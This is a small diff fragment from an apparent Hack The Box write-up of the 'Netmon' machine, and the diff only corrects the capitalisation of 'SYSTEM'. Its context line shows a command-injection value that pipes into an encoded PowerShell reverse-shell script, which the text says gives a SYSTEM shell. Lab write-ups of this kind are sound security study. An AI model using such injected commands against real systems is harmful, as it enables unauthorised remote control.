Kyuu-Ji/htb-write-up/netmon/write-up-netmon.md

 test | powershell -enc [base64 shell.ps1]
 ```

-This time we get a reverse shell as _NT Authority\SySTEM_ and can read root.txt!
+This time we get a reverse shell as _NT Authority\SYSTEM_ and can read root.txt!